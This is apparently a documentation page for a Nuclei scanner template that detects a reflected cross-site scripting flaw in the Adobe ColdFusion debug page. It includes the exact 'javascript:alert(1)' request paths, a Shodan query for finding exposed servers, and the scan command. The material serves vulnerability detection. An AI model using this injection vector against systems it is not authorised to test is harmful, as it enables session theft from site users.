Adobe ColdFusion - Cross-Site Scripting
ID: coldfusion-debug-xss
Severity: high
Author: dhiyaneshDK
Tags: adobe,coldfusion,xss
Description
Section titled “Description”Adobe ColdFusion debug page contains a cross-site scripting vulnerability when the application is running on a remote host. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: coldfusion-debug-xss
info: name: Adobe ColdFusion - Cross-Site Scripting author: dhiyaneshDK severity: high description: Adobe ColdFusion debug page contains a cross-site scripting vulnerability when the application is running on a remote host. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Adobe ColdFusion" product: coldfusion vendor: adobe tags: adobe,coldfusion,xss
http: - method: GET path: - '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)' - '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
matchers-condition: and matchers: - type: word part: body words: - '"cf_main_cf" src="javascript:alert(1)"'
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4b0a004830460221008945e395883914f70c41477cc3b7098cc86cd87c5e4e7c0d8ec2f4874aaab16d02210085907c4c0f2e55f9a278bbfe41b4debcca00eb4ae519c89af5807d50b26419f0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/coldfusion-debug-xss.yaml"